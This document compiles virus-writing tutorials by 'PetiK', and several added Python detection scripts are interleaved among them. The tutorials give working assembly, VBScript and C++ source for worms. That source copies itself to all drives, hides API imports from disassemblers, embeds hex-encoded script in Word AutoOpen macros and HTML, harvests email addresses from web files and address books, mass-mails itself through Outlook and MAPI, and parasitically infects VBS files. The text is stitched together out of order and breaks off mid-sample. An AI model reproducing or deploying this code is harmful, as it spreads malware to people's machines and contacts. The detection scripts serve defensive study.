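        if section == "windows" and key in ("run", "load"):
            for program in re.split(r"[ ,]+", value):
                if program:
                    found.append(Finding("WIN.INI", "run-at-logon", program))
    return found


# The article's generator yields 1..9 lowercase letters + ".exe"; on its own this
# pattern is weak (it also matches many legitimate names), so it is only reported.
RANDOM_EXE = re.compile(r"^[a-z]{1,9}\.exe$")


def relocation_indicators(wininit_text, winini_text):
    """A program scheduled to start together with a file scheduled for deletion
    is the copy-then-erase-the-original pattern the article describes."""
    deletes = scan_wininit(wininit_text)
    runs = scan_winini(winini_text)
    random_named = [f for f in runs if RANDOM_EXE.match(f.path.rsplit("\\", 1)[-1])]
    return {
        "findings": deletes + runs,
        "relocation_pattern": bool(deletes) and bool(runs),
        "random_named_autoruns": random_named,
    }


# Constructed samples (not real system files).
SAMPLE_WININIT = r"""[rename]
NUL=C:\Download\attach.exe
"""
SAMPLE_WININI = r"""[windows]
load=
run=C:\WINDOWS\SYSTEM\jwvv.exe
[Desktop]
Wallpaper=(None)
"""

if __name__ == "__main__":
    report = relocation_indicators(SAMPLE_WININIT, SAMPLE_WININI)
    for f in report["findings"]:
        print(f"{f.source}: {f.kind}: {f.path}")
    print("relocation pattern:", report["relocation_pattern"])
```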
########################################
#II:Spread a worm into different drives#
########################################
One copy is good, many copies are better. In fact, we can create a sort of "backup"
of the worm on the different drives of the system.
It's easy to code this (too easy perhaps).
start_worm:
push 50
mov esi,offset orig_worm ; Take the name of the worm
push esi
push 0
api GetModuleFileNameA
spread_system:
call @lect
db "D:\",0 ; The different drives. We don't
db "E:\",0 ; use A,B because they are certainly
...... ; floppy drives.
db "Y:\",0
db "Z:\",0
@lect:
pop esi
push 23 ; Number of drives 26-3=23
pop ecx
loop_lect:
push ecx
push esi
api SetCurrentDirectoryA
; test eax,eax
; jnz continue_spread
push 0
@pushsz "winbackup.exe" ; name of copy
push offset orig_worm
api CopyFileA
;continue_spread:
@endsz
pop ecx
loop loop_lect
end_spread_system:
-----------------------source-----------------------
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
include Useful.inc
start_worm:
push 50
mov esi,offset orig_worm
push esi
push 0
api GetModuleFileNameA
spread_system:
call @lect
db "D:\",0
db "E:\",0
db "F:\",0
db "G:\",0
db "H:\",0
db "I:\",0
db "J:\",0
db "K:\",0
db "L:\",0
db "M:\",0
db "N:\",0
db "O:\",0
db "P:\",0
db "Q:\",0
db "R:\",0
db "S:\",0
db "T:\",0
db "U:\",0
db "V:\",0
db "W:\",0
db "X:\",0
db "Y:\",0
db "Z:\",0
@lect:
pop esi
push 23
pop ecx
loop_lect:
push ecx
push esi
api SetCurrentDirectoryA
push 0
@pushsz "winbackup.exe"
push offset orig_worm
api CopyFileA
@endsz
pop ecx
loop loop_lect
end_spread_system:
end_worm:
push 0
api ExitProcess
.data
orig_worm db 50 dup (0)
lect db 50 dup (0)
end start_worm
end
-----------------------source-----------------------
###########################################
#III:Extract API from KERNEL32.DLL library#
###########################################
A lot of disassemblers/debuggers (like W32DASM) can find the APIs used by a program.
And a worm/virus/trojan is a program.
With a normal program (using "extrn API:proc"), the Import Functions list of W32DASM shows
KERNEL32.CloseHandle
KERNEL32.CreateFileA
KERNEL32.GetModuleHandleA
KERNEL32.GetProcAddress
KERNEL32.WriteFile
A user who debugs the program can suspect that the program creates or opens a file to write
something. We can hide KERNEL32.CloseHandle,
KERNEL32.CreateFileA and
KERNEL32.WriteFile.
How ?? By extracting the APIs from KERNEL32.DLL
code section
------------
First: Open KERNEL32.DLL:
@pushsz "KERNEL32.DLL"
api GetModuleHandleA
xchg eax,ebx
Second: Use a macro to take the address of APIs:
kern macro x
push offset sz&x
push ebx
api GetProcAddress
mov _ptk&x,eax
endm
Third: Extract the different APIs:
kern CloseHandle
kern CreateFileA
kern WriteFile
api macro a
extrn a:proc
call a
endm
include Useful.inc
start_worm:
@pushsz "KERNEL32.DLL"
api GetModuleHandleA
xchg eax,ebx
kern macro x
push offset sz&x
push ebx
api GetProcAddress
mov _ptk&x,eax
endm
kern CloseHandle
kern CreateFileA
kern WriteFile
prep_spread_worm:
push 0
push 80h
push 2
push 0
push 1
push 40000000h
@pushsz "C:\KernApi.txt"
call _ptkCreateFileA
xchg eax,ebx
push 0
push offset octets
push e_txt - s_txt
push offset s_txt
push ebx
call _ptkWriteFile
push ebx
call _ptkCloseHandle
.data
octets dd ?
szCloseHandle db "CloseHandle",0
szCreateFileA db "CreateFileA",0
szWriteFile db "WriteFile",0
_ptkCloseHandle dd ?
_ptkCreateFileA dd ?
_ptkWriteFile dd ?
s_txt: db 'Text file create with',CRLF
db 'APIs extract from',CRLF
db 'KERNEL32.DLL library',CRLF,CRLF
db 9,'PetiK',CRLF
e_txt:
end start_worm
end
-----------------------source-----------------------
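The other side of the trick in part III: when a binary imports little more than GetModuleHandleA and GetProcAddress, the names it resolves at run time (szCloseHandle, szCreateFileA, szWriteFile above) are still sitting in its data section as plain strings. The triage heuristic below is an added example for this page (not PetiK's code); it works on an already-extracted import list and a raw section blob, both constructed here, rather than on a real PE parser.

```python
"""Import-hiding triage: flag a sample whose import table is only dynamic-resolution
machinery while watched API names appear as strings in its data.
Added example, standard library only; inputs are constructed."""
import re

# Imports that by themselves say nothing about what the program does.
RESOLVER_IMPORTS = {"GetModuleHandleA", "GetProcAddress", "LoadLibraryA", "ExitProcess"}

# API names worth noticing as data-but-not-import. A short hand-picked set for
# the example; a real triage list would be far longer.
WATCHED_APIS = {
    "CreateFileA", "WriteFile", "CloseHandle", "CopyFileA", "CreateFileMappingA",
    "MapViewOfFile", "WritePrivateProfileStringA", "WriteProfileStringA",
    "RegSetValueExA", "SHSetValueA",
}

PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{4,}")


def strings(blob):
    """ASCII runs of 4+ printable bytes, what a strings(1)-style pass yields.
    NUL terminators (as in `szCloseHandle db "CloseHandle",0`) split the runs."""
    return [m.group().decode("ascii") for m in PRINTABLE_RUN.finditer(blob)]


def _bare_names(imports):
    """Strip the 'KERNEL32.' prefix W32DASM prints in front of each import."""
    return {imp.split(".", 1)[-1] for imp in imports}


def resolver_only(imports):
    """True when every imported name is just resolution machinery."""
    names = _bare_names(imports)
    return bool(names) and names <= RESOLVER_IMPORTS


def hidden_apis(imports, blob):
    """Watched API names present verbatim as strings but absent from the imports."""
    imported = _bare_names(imports)
    return sorted({s for s in strings(blob) if s in WATCHED_APIS and s not in imported})


def triage(imports, blob):
    hidden = hidden_apis(imports, blob)
    only_resolver = resolver_only(imports)
    return {
        "resolver_only": only_resolver,
        "hidden_apis": hidden,
        # Both signals together are the pattern the article aims for.
        "suspicious": only_resolver and bool(hidden),
    }


# Constructed sample mirroring the W32DASM listing above: only the resolver pair
# (plus ExitProcess) is imported, while .data carries the three names to resolve.
SAMPLE_IMPORTS = ["KERNEL32.GetModuleHandleA", "KERNEL32.GetProcAddress", "KERNEL32.ExitProcess"]
SAMPLE_DATA = (b"KERNEL32.DLL\x00" + b"\x00" * 4
               + b"CloseHandle\x00CreateFileA\x00WriteFile\x00"
               + b"\x00" * 12 + b"C:\\KernApi.txt\x00")

# A normally linked program for contrast: the same names, but in the import table.
NORMAL_IMPORTS = SAMPLE_IMPORTS + ["KERNEL32.CloseHandle", "KERNEL32.CreateFileA", "KERNEL32.WriteFile"]

if __name__ == "__main__":
    print(triage(SAMPLE_IMPORTS, SAMPLE_DATA))
    print(triage(NORMAL_IMPORTS, SAMPLE_DATA))
```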
#############
#Conclusion:#
#############
#################
# Introduction: #
#################
I wrote this article after programming VBS.Xchange and VBS.Doublet (two VBS/DOC infectors).
There are three parts in this article.
- Hex Conversion : how to convert an ASCII file (a VBS into a module of Word, for example).
- Spread with "mailto:" : spread a VBS worm with web files.
- Random Name Generator : to give each new copy of a VBS worm/virii a new name at each start.
I succeeded in coding this without looking at other sources.
This sort of article is of course not for good coderz but for the newbies (NOT LAMERZ) and
all people who want to learn about WORM programming.
###################
# HEX CONVERSION: #
###################
Why convert a file to hexadecimal ?? For example to put it in a module of a Word document.
How to do this ??
1) Set fso=CreateObject("Scripting.FileSystemObject")
Set fl=fso.OpenTextFile(WScript.ScriptFullname,1)
virus=fl.ReadAll ' Read all the file
fl.Close
2) For i=1 To len(virus) ' Take the size of the file
3) e=Mid(virus,i,1) ' Take one byte after one.
e=Hex(Asc(e)) ' And convert in hexa. (P=50;e=65;...)
4) If Len(e)=1 Then ' If the hexa < 10h we add a 0
e="0"&e ' Example : return (0Dh0Ah). We will have D and A.
End If ' So we add a 0 => 0D and 0A
5) f=f+e ' This part is for the length of the line in the module
If Len(f)=110 Then ' of the document (it doesn't support lines that are too long).
sp.WriteLine "e = e + """+f+"""" ' Here we put 110 character:
f="" ' e = e + "...110 char..."
End If
6) If Len(virus)-i = 0 Then ' Here is for the last line if there are less than 110 chars :
sp.WriteLine "e = e + """+f+"""" ' e = e + "... 1 < number of char < 110..."
f=""
End If
So the source code :
************************************************************************************************************************
On Error Resume Next
Set fso=CreateObject("Scripting.FileSystemObject")
Set fl=fso.OpenTextFile(WScript.ScriptFullname,1)
virus=fl.ReadAll
fl.Close
set sp=fso.CreateTextFile("example_vbshex.txt",True,8)
sp.WriteLine "Attribute VB_Name = ""VirModule"""
sp.WriteLine "Sub AutoOpen()"
sp.WriteLine "On Error Resume Next"
sp.WriteLine "e = """""
For i=1 To len(virus)
e=Mid(virus,i,1)
e=Hex(Asc(e))
If Len(e)=1 Then
e="0"&e
End If
f=f+e
If Len(f)=110 Then
sp.WriteLine "e = e + """+f+""""
f=""
End If
If Len(virus)-i = 0 Then
sp.WriteLine "e = e + """+f+""""
f=""
End If
Next
sp.WriteLine "read=dec(e)"
sp.WriteLine "Open ""C:\newvbsfile.vbs"" For Output As #1"
sp.WriteLine "Print #1, read"
sp.WriteLine "Close #1"
sp.WriteLine "Shell ""wscript C:\newvbsfile.vbs"""
sp.WriteLine "End Sub"
sp.WriteLine ""
sp.WriteLine "Function dec(octe)"
sp.WriteLine "For hexad = 1 To Len(octe) Step 2"
sp.WriteLine "dec = dec & Chr(""&h"" & Mid(octe, hexad, 2))"
sp.WriteLine "Next"
sp.WriteLine "End Function"
sp.Close
************************************************************************************************************************
#########################
# SPREAD WITH "MAILTO:" #
#########################
Now we are going to see how to spread a VBS worm without the Windows AddressBook (aka WAB).
If we can't use the WAB, we can read old mails and take the emails. But too bad, I can't code this
in VBS. Last solution : take the emails from WEB files (htm, html, asp, etc...).
1) if (ext="htm") or (ext="html") or (ext="htt") or (ext="asp") Then ' Take the good extension
' htm, html, asp, doc, xls
set htm=fso.OpenTextFile(fil.path,1) ' and open the file.
verif=True
allhtm=htm.ReadAll() ' Read all the file.
htm.Close
Sub spreadmailto(dir)
On Error Resume Next
Set fso=CreateObject("Scripting.FileSystemObject")
Set f=fso.GetFolder(dir)
Set cf=f.Files
For Each fil in cf
ext=fso.GetExtensionName(fil.path)
ext=lcase(ext)
if (ext="htm") or (ext="html") or (ext="htt") or (ext="asp") Then
set htm=fso.OpenTextFile(fil.path,1)
allhtm=htm.ReadAll()
htm.Close
For ml=1 To Len(allhtm)
count=0
If Mid(allhtm,ml,7) = "mailto:" Then
counter=counter+1
mlto=""
Do While Mid(allhtm,ml+6+count,1) <> """"
count=count+1
mlto = mlto + Mid(allhtm,ml+6+count,1)
loop
mel.WriteLine counter &" <"&left(mlto,len(mlto)-1)&">"
msgbox mlto
sendmailto(left(mlto,len(mlto)-1))
End If
Next
End If
Next
End Sub
Sub list(dir)
On Error Resume Next
Set f=fso.GetFolder(dir)
Set ssf=f.SubFolders
For Each fil in ssf
spreadmailto(fil.path)
list(fil.path)
Next
End Sub
Sub sendmailto(email)
Set out=CreateObject("Outlook.Application")
Set mailmelto=out.CreateItem(0)
mailmelto.To email
mailmelto.Subject "Subject of worm"
mailmelto.Body "Body of worm"
mailmelto.Attachment.Add (WScript.ScriptFullName)
mailmelto.DeleteAfterSubmit = True
mailmelto.Send
Set out = Nothing
End Sub
************************************************************************************************************************
In the spread_mailto.txt file we have this:
************************************************************************************************************************
1 <Petikvx@aol.com>
2 <VBS.Ketip.A@mm>
3 <PetiK@aol.com>
4 <kavdaemon@relay.avp.ru>
5 <kavdaemon@relay.avp.ru>kavdaemon@relay.avp.ru</A></TD></TR>
<TR class=aolmailheader>
<TD noWrap vAlign=top width=>
6 <Pentasm99@aol.com>
7 <Pentasm99@aol.com screenname=>
...
...
************************************************************************************************************************
##########################
# RANDOM NAME GENERATOR: #
##########################
As I said in my last article about "Hide a copy of worm", we are going to do the same thing in VBS.
1) tmpname="" ' Value of tmpname is NULL
2) randomize(timer) ' Random size of the first part of name
namel=int(rnd(1)*20)+1 ' between 1 and 20.
3) For lettre = 1 To namel ' Put the letter.
randomize(timer) ' 97 : Start from "a" (65 : Start from "A")
tmpname=tmpname & chr(int(rnd(1)*26)+97) ' 26 : from "a-A" to "z-Z"
Next ' for number 26 => 9 and 97 => 48
4) typext = "execombatbmpjpggifdocxlsppthtmhtthta" ' Now we choose an extension among 12 different ones.
randomize(timer)
tmpext = int(rnd(1)*11)+1
5) tmpname=tmpname & "." & mid(typext,((tmpext-1)*3)+1,3) & ".vbs" ' And we have the result
Source code:
************************************************************************************************************************
tmpname=""
randomize(timer)
namel=int(rnd(1)*20)+1
For lettre = 1 To namel
randomize(timer)
tmpname=tmpname & chr(int(rnd(1)*26)+97)
Next
typext = "execombatbmpjpggifdocxlsppthtmhtthta"
randomize(timer)
tmpext = int(rnd(1)*11)+1
tmpname=tmpname & "." & mid(typext,((tmpext-1)*3)+1,3) & ".vbs"
MsgBox tmpname
************************************************************************************************************************
Some Examples:
mhrmhoulleyl.htm.vbs
rlvqmtyppjcbho.bat.vbs
PREYXUDBNYKNLRSALL.DOC.VBS
869768177527247364.gif.vbs
...
...
This technique is handy to change the name of the worm's copy at each start (look at my last article).
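The generator above produces names of the form `<random stem>.<decoy ext>.vbs`, with the decoy drawn from the typext string, so a filename filter can key on exactly that shape. The checker below is an added example for this page (not PetiK's code); the script extensions beyond .vbs are my addition (the other Windows Script Host types), and the sample names are the article's own examples plus constructed benign ones.

```python
"""Flag double-extension script names of the shape the article's generator emits
and rate whether the stem looks machine-generated. Added example, stdlib only."""

TYPEXT = "execombatbmpjpggifdocxlsppthtmhtthta"            # the article's decoy string
DECOY_EXTS = {TYPEXT[i:i + 3] for i in range(0, len(TYPEXT), 3)}   # 12 three-letter decoys
SCRIPT_EXTS = {"vbs", "vbe", "js", "jse", "wsf", "wsh"}     # handled by WScript/CScript
VOWELS = set("aeiou")


def split_double_extension(name):
    """Return (stem, decoy, script) for names like 'x.doc.vbs', else None.
    The stem keeps its case; extensions are compared case-insensitively."""
    parts = name.rsplit(".", 2)
    if len(parts) != 3:
        return None
    stem, decoy, script = parts[0], parts[1].lower(), parts[2].lower()
    if stem and decoy in DECOY_EXTS and script in SCRIPT_EXTS:
        return stem, decoy, script
    return None


def longest_consonant_run(stem):
    run = best = 0
    for ch in stem.lower():
        if ch.isalpha() and ch not in VOWELS:
            run += 1
            best = max(best, run)
        else:
            run = 0
    return best


def stem_looks_generated(stem):
    """The generator uses a single character class (chr(rnd*26)+97, +65, or +48):
    all lowercase, all uppercase, or all digits. Letters are drawn uniformly, so
    consonant runs of 4+ that real words rarely contain are the tell."""
    if not stem:
        return False
    if stem.isdigit():
        return True
    if not (stem.isalpha() and (stem.islower() or stem.isupper())):
        return False
    return longest_consonant_run(stem) >= 4


def classify(name):
    hit = split_double_extension(name)
    if hit is None:
        return {"name": name, "double_extension": False, "generated_stem": False, "score": 0}
    stem, decoy, script = hit
    generated = stem_looks_generated(stem)
    return {"name": name, "double_extension": True, "decoy": decoy, "script": script,
            "generated_stem": generated, "score": 2 + int(generated)}


def flagged(names):
    """Every name that carries the decoy + script double extension."""
    return [c for c in map(classify, names) if c["double_extension"]]


# The article's own examples plus constructed benign names.
SAMPLE_NAMES = [
    "mhrmhoulleyl.htm.vbs", "rlvqmtyppjcbho.bat.vbs", "PREYXUDBNYKNLRSALL.DOC.VBS",
    "869768177527247364.gif.vbs", "readme.htm.vbs", "report.doc", "setup.exe",
]

if __name__ == "__main__":
    for c in flagged(SAMPLE_NAMES):
        print(f"{c['score']} {c['name']} (decoy .{c['decoy']}, generated={c['generated_stem']})")
```

DECOY_EXTS is deliberately the article's list; a general-purpose filter would widen it to any non-script extension.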
###############
# CONCLUSION: #
###############
This is the end of the article. I hope that it helps you in your creations and research.
If you have any suggestions or comments, please mail me at petikvx@aol.com
PetiK (www.petikvx.fr.fm)
=== Three ways of spread ===
=== by PetiK (05/20/2002) ===
#################
# Introduction: #
#################
I present in this article the three main ways that I use to spread my worms.
##############
# Read Mail: #
##############
I use this first way when I code a worm in C++. The syntax is simple. For this we use the
MAPI functions : FindNext, ReadMail, SendMail and FreeBuffer
hMAPI=LoadLibrary("MAPI32.DLL");
(FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
(FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon");
(FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff");
(FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext");
(FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail");
(FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer");
And at the end, the syntax to read the mail, take the email and send the mail :
// Initialize MAPI
mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session);
// Here we take the "name" and the "email" of the guy who sent the mail
strcpy(mname,mes->lpOriginator->lpszName);
strcpy(maddr,mes->lpOriginator->lpszAddress);
mes->ulReserved=0;
mes->lpszSubject="Subject of worm";
mes->lpszNoteText="Body of Worm.";
mes->lpszMessageType=NULL;
mes->lpszDateReceived=NULL;
mes->lpszConversationID=NULL;
mes->flFlags=MAPI_SENT;
mes->lpOriginator->ulReserved=0;
mes->lpOriginator->ulRecipClass=MAPI_ORIG;
mes->lpOriginator->lpszName=mes->lpRecips->lpszName;
mes->lpOriginator->lpszAddress=mes->lpRecips->lpszAddress;
mes->nRecipCount=1;
mes->lpRecips->ulReserved=0;
mes->lpRecips->ulRecipClass=MAPI_TO;
// Close MAPI
mLogoff(session,0,0,0);
FreeLibrary(hMAPI);
}
If you can use these functions in VBS (or VB), very good (and mail me).
************************************************************************************************
#####################
# "mailto:" string: #
#####################
{Win32Asm}
call CreateFileA
inc eax
je END_S
dec eax
xchg eax,ebx
push PAGE_READONLY
push 0
push ebx
call CreateFileMappingA
test eax,eax
jz FERME1
3rd:
push FILE_MAP_READ
push ebp
call MapViewOfFile
test eax,eax
jz FERME2
xchg eax,esi
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
{C++}
First : FindFile
hFile=FindFirstFile(ext,&ffile); //
if(hFile!=INVALID_HANDLE_VALUE) { //
while(abc) { //
GetMail(ffile.cFileName,mail); //
if(strlen(mail)>0) { // NO COMMENTS !
sendmail(mail); //
} //
abc=FindNextFile(hFile,&ffile); //
} //
} //
hf=CreateFile(namefile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,0);
if(hf==INVALID_HANDLE_VALUE)
return; // Like in Win32Asm :
size=GetFileSize(hf,NULL); // Open File
if(!size)
return; // Empty ?? Close it
size-=100;
hf2=CreateFileMapping(hf,0,PAGE_READONLY,0,0,0);
if(!hf2) {
CloseHandle(hf); // Map the file
return;
}
mapped=(char *)MapViewOfFile(hf2,FILE_MAP_READ,0,0,0);
if(!mapped) {
CloseHandle(hf2);
CloseHandle(hf);
return;
}
i=0;
while(i<size && !test) {
if(!strncmpi("mailto:",mapped+i,strlen("mailto:"))) { // If "mailto:" string exists ??
test=TRUE;
i+=strlen("mailto:");
k=0;
while(mapped[i]!=34 && mapped[i]!=39 && i<size && k<127) { // Until " or ' character
if(mapped[i]!=' ') {
mail[k]=mapped[i];
k++;
if(mapped[i]=='@') // Check @ character
valid=TRUE;
}
i++;
}
mail[k]=0; // and store the email in the mail buffer
} else
i++;
}
if(!valid)
mail[0]=0;
UnmapViewOfFile(mapped);
CloseHandle(hf2);
CloseHandle(hf);
return;
}
from.lpszName=NULL;
from.ulRecipClass=MAPI_ORIG;
mess.lpszSubject="Subject of mail";
mess.lpszNoteText="Body of mail";
mess.lpRecips=(MapiRecipDesc *)malloc(sizeof(MapiRecipDesc));
if(!mess.lpRecips)
return;
memset(mess.lpRecips,0,sizeof(MapiRecipDesc));
mess.lpRecips->lpszName=tos; // Here the mail that we found
mess.lpRecips->lpszAddress=tos;
mess.lpRecips->ulRecipClass=MAPI_TO;
mess.nRecipCount=1;
mess.lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
if(!mess.lpFiles)
return;
memset(mess.lpFiles,0,sizeof(MapiFileDesc));
mess.lpFiles->lpszPathName="FullName_of_the_worm.exe";
mess.lpFiles->lpszFileName="othername_of_worm.exe";
mess.nFileCount=1;
mess.lpOriginator=&from;
free(mess.lpRecips);
free(mess.lpFiles);
}
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
{VBS}
************************************************************************************************
########################
# Outlook Address Book #
########################
{Win32Asm}
In the virus/worm Win32.HiV, Benny scans the default WAB file to spread.
But it was a little difficult for me. Then I coded differently.
srch_wab:
mov edi,offset wab_path
push offset wab_size ; = fullname of WAB file
push edi
push offset reg
push 0
@pushsz "Software\Microsoft\Wab\WAB4\Wab File Name" ; The name of WAB file
push 80000001h
api SHGetValueA
Then open and map the file, like for the HTM and HTML files (see above).
Now, scan the file:
d_scan_mail:
call @smtp
db 'SMTP',00h,1Eh,10h,56h,3Ah ; the string what we want to find
@smtp:
pop edi
s_scan_mail:
pushad
push 9
pop ecx
rep cmpsb
popad
je scan_mail
inc esi
loop s_scan_mail
....
scan_mail:
xor edx,edx
add esi,21
mov edi,offset mail_addr
push edi ; EDI = EMail
p_c: lodsb
cmp al," "
je car_s
cmp al,00h
je f_mail
cmp al,"@"
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
f_mail: xor al,al
stosb
pop edi
test edx,edx
je d_scan_mail
call send_mail
jmp d_scan_mail
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
{VBA}
I took the code from W97M.Melissa.A:
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
{VBS}
I took the code from VBS.StarMania:
Set O=CreateObject("Outlook.Application")
Set mapi=O.GetNameSpace("MAPI")
For Each AL In mapi.AddressLists
If AL.AddressEntries.Count <> 0 Then
For AddListCount = 1 To AL.AddressEntries.Count
Set ALE = AL.AddressEntries(AddListCount)
Set go = O.CreateItem(0)
go.To = ALE.Address
go.Subject = "GUESS"
go.Body = "GUESS"
go.Attachments.Add(WScript.ScriptFullName)
go.DeleteAfterSubmit = True
go.Send
************************************************************************************************
###############
# Conclusion: #
###############
PetiK (www.petikvx.fr.fm)
=== What language for which work ?? ===
=== by PetiK (06/02/2002) ===
#################
# Introduction: #
#################
Often new coders (like newbies) ask themselves what is the best language to code
viruses/worms. So I try to present the different languages that I use to code
my works. First I present the compiled languages (Win32Asm - C/C++ - VB) and
second the script languages.
################
# 1) Win32asm: # THE BEST
################
It's by far the best way to code viruses/worms. You can control everything with it.
This language is useful for a good infection. Today, 98 % of virii are coded
in assembler. There are different ways to spread worms too.
First the MAPI functions. Look at my works (and others) to see the syntax.
Other way : SMTP. It's a good device to deceive the victims. They can believe
that an email comes from a company (support@microsoft.com) or from themselves. But it
is a difficult language in the beginning. See, read and learn tutorials and
other virii/worms' sources.
#############
# 2) C/C++: #
#############
I learnt this language 6 months ago. Advantage : the syntax is as easy as ASM.
It's especially a language to code worms thanks to <mapi.h>.
You can spread your work by reading old mails or scanning some WEB files, but also
by coding an SMTP process.
This language is equally used to code worms that use IIS servers to spread, like
the worm W32.Nimda.Worm.
With this language, you can code Linux virii/worms too.
##########
# 3) VB: #
##########
Of course it's a lame language. But you can use Outlook's Address Book to
spread your work without effort. But programs of this sort are quickly detected
by AV (Norton : Bloodhound.W32.VBWORM).
Personally, I use this language to code some tools like Virii/Worms Generators
or other things.
###########
# 4) VBS: #
###########
############
# 5) HTML: #
############
With this language, the most interesting are the virii. Of course you code in
VBS language (or in JavaScript). This is the same syntax. Try to find a new
sort of spreading.
###########
# 6) VBA: #
###########
If you know the VBS language, you won't have problemz coding a macro
virus (DOC / XLS). Coding macro virii is the easiest thing in the VX life. So
you must find novelties (new ways to infect DOC files, infect DOC/XLS files
or spread through DOC/EXE files, etc...). Spreading is easy too : Melissa.A.
###############
# Conclusion: #
###############
PetiK (www.petikvx.fr.fm)
=== VBS/HTML multi-infection ===
=== by PetiK (06/19/2002) ===
#################
# Introduction: #
#################
This article presents how to travel between VBS and HTML files to infect them.
There are 4 chapters : I: VBS -> VBS
II: VBS -> HTML
III: HTML-> HTML
IV: HTML-> VBS
#################
# I: VBS -> VBS #
#################
We can frequently see this in VBS viruses. There are two sorts of infection:
-Overwriting : % Too bad, the user sees the problem immediately
% Crashes the VBS file
So this solution is not very good.
-Parasitic : % Start of the file :
**********************
* 'mark of the virus *
* *
* + *
* *
* VBS virus *
**********************
* *
* Real VBS prog *
* *
**********************
% End of the file :
**********************
* 'mark of the virus *
**********************
* *
* Real VBS prog *
* *
**********************
* *
* VBS virus *
* *
**********************
So we're going to see the code :
'mark
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
Set fl = fso.OpenTextFile(WScript.ScriptFullName, 1)
virus = fl.ReadAll ' Stock the virus code
fl.Close
infectfile()
Sub infectfile()
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set drv = fso.Drives
For Each d In drv ' Get the drive
If d.DriveType = 2 Or d.DriveType = 3 Then
list(d.path&"\")
End If
Next
End Sub
Sub list(doss)
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set fold = fso.GetFolder(doss)
Set yebjp = fold.SubFolders
For Each f1 In yebjp ' Get the folder
infect(f1.Path)
list(f1.Path)
Next
End Sub
Sub infect(doss)
On Error Resume Next
Set zqhanx = CreateObject("Scripting.FileSystemObject")
Set lxxj = zqhanx.GetFolder(doss)
Set fc = lxxj.Files
For Each f1 In fc ' Get the files
ext = fso.GetExtensionName(f1.Path)
ext = lCase(ext)
If (ext = "vbs") Then
Set cot = fso.OpenTextFile(f1.Path, 1, False)
If cot.ReadLine <> "'mark" Then ' check is already infected
cot.Close
Set cot = fso.OpenTextFile(f1.Path, 1, False)
vbsorg = cot.ReadAll()
cot.Close
Set inf = fso.OpenTextFile(f1.Path, 2, True)
inf.WriteLine virus ' write virus code
inf.WriteLine ""
inf.WriteLine (vbsorg) ' write real code
inf.Close
End If
End If
Next
End Sub
###################
# II: VBS -> HTML #
###################
So, the idea is to put the viral VBS code into the HTML file. How ?? By converting it into a hex string :
....
....
If (ext = "htm") or (ext = "html") Then
Set cot = fso.OpenTextFile(f1.Path, 1, False)
If InStr(1,cot.ReadAll(),"vbshex") = 0 Then ' check is already infected
cot.Close
Set htmf = fso.OpenTextFile(f1.Path, 8, False)
htmf.WriteLine "<SCRIPT LANGUAGE=VBSCRIPT>"
f = "vbshex="""
For i = 1 to Len(virus) ' take all char
e=Mid(virus,i,1)
e=Hex(Asc(e)) ' and convert in hex
If Len(e)=1 Then
e="0"&e 'DA -> 0D0A for VbCrLf
End If
f=f+e
Next
f=f+""""
...... NO FINISH, SEE THE fourth chapter ' Here the infection HTML -> VBS
htmf.WriteLine f
htmf.Close
End If
End If
Set htmf = fso.CreateTextFile("hello.htm",8,-2)
htmf.WriteLine "<SCRIPT LANGUAGE=VBSCRIPT>"
f = "vbshex="""
For i = 1 to Len(virus)
e=Mid(virus,i,1)
e=Hex(Asc(e))
If Len(e)=1 Then
e="0"&e
End If
f=f+e
Next
f=f+""""
htmf.WriteLine f
htmf.Close
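Both carriers on this page, the Word module built in the Hex Conversion section of "Some VBS Technics" (`e = e + "..."` lines) and the HTML written by the routine just above (`vbshex="..."`), store the script as a hex string next to a `Chr("&H" & Mid(...))` loop that rebuilds it at run time. An analyst can undo that statically; the recovery below is an added example for this page (not PetiK's code), and the two carrier samples are constructed.

```python
"""Recover a hex-encoded script from a Word-module or HTML carrier of the form
described in this article, and report whether the run-time decoder is present.
Added example, standard library only."""
import re

# One chunk of the hex string in either carrier form.
HEX_CHUNK = re.compile(r'(?:\be\s*=\s*e\s*\+|\bvbshex\s*=)\s*"([0-9A-Fa-f]*)"', re.IGNORECASE)
# The decoder loop both variants share: Step 2 ... Chr("&H" & Mid(<str>, <i>, 2)).
DECODE_LOOP = re.compile(r'Step\s+2.*?Chr\s*\(\s*"&H"\s*&\s*Mid\s*\(', re.IGNORECASE | re.DOTALL)


def extract_hex(text):
    """Concatenate the chunks in document order, as the carrier's own e = e + ... does."""
    return "".join(m.group(1) for m in HEX_CHUNK.finditer(text))


def decode_hex(hexstr):
    """Chr("&H" & xx) yields the character with code xx; VBScript's Chr follows the
    ANSI code page, so cp1252 reproduces what the carrier would write to disk."""
    if len(hexstr) % 2:
        raise ValueError("hex string has odd length")
    return bytes.fromhex(hexstr).decode("cp1252", errors="replace")


def analyse(text):
    hexstr = extract_hex(text)
    return {
        "hex_chunks": len(HEX_CHUNK.findall(text)),
        "has_decoder": DECODE_LOOP.search(text) is not None,
        "payload": decode_hex(hexstr) if hexstr else "",
    }


# Constructed Word-module carrier; the two chunks encode
# 'On Error Resume Next' + CRLF and 'MsgBox "Hello"' + CRLF.
SAMPLE_MODULE = '''Attribute VB_Name = "VirModule"
Sub AutoOpen()
On Error Resume Next
e = ""
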